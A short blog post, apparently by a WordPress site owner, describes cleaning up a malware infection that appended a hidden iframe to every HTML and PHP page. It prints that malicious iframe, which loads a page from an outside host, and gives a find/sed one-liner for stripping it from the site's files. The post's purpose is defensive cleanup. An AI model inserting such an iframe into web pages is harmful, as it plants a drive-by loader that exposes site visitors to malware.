kallasoft

It seems that a new WordPress malware hijack is making the rounds and we got hit. Google just issued me a “this site contains malware” warning for my sites, after some quick investigation it looks like the hijack has attached a malicious <iframe> block to the end of every HTML and PHP page in the site, so now I need to clean it out.

Luckily this is just like last time, and was easy to get rid of. I hope this tip helps someone else out as well.

This time, the iframe snippet that was getting added was:

<iframe src="http://reycross.com/laso/s.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

Luckily, I had my old script laying around that systematically searches through all my files and removed the offending piece of crap from the files, you can use this script command as well to do the same:

find . -name '*.*' -exec sed -i 's/<iframe src="http:\/\/reycross.com\/laso\/s.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><\/iframe>//g' {} \;

Hope this helps anybody else getting sacked by this attack. I think it has to do with a theme vulnerability